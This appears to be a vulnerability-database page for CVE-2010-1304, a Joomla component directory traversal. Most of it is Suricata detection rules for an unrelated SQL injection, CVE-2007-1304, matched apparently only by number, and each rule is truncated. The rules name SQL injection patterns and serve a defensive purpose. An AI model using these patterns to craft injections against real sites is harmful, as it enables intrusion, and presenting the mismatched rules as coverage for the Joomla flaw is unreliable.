CVE-2010-1304
published 2010-04-08CVE-2010-1304: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary…
PriorityP338medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
14.04%
96.1th percentile
Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlamo | com_userstatus | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name DELETE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"name="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004496; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mi
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email DELETE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email DELETE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email DELETE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"email="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004508; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190,
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country ASCII
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country ASCII
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country ASCII"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"country="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004503; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message DELETE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message DELETE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message DELETE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"message="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004520; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"country="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004504; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UNION SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UNION SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UNION SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"email="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004506; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techni
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"email="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004510; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190,
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UNION SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UNION SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UNION SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"message="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004518; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"website="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004511; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email ASCII
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email ASCII
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email ASCII"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"email="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004509; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UNION SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UNION SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UNION SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"name="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004494; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"email="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004505; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190,
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name INSERT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name INSERT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name INSERT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"name="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004495; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mi
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website DELETE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website DELETE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website DELETE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"website="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004514; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email INSERT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email INSERT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email INSERT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"email="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004507; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190,
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"website="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004516; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name ASCII
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name ASCII
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name ASCII"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"name="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004497; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, m
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"name="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004498; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mit
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"message="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004517; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country INSERT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country INSERT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country INSERT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"country="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004501; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"message="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004522; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UNION SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UNION SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UNION SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"website="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004512; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"country="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004499; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website INSERT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website INSERT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website INSERT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"website="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004513; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country DELETE
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country DELETE
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country DELETE"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"country="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004502; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UNION SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UNION SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UNION SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"country="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004500; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name SELECT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name SELECT"; flow:established,to_server; http.uri; content:"/add2.php?"; nocase; content:"name="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1304; reference:url,www.securityfocus.com/bid/22820; classtype:web-application-attack; sid:2004493; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mi
Suricata
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message INSERT
suricata·2010-07-30·CVSS 6.8
CVE-2007-1304 [MEDIUM] ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message INSERT
ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message INSERT
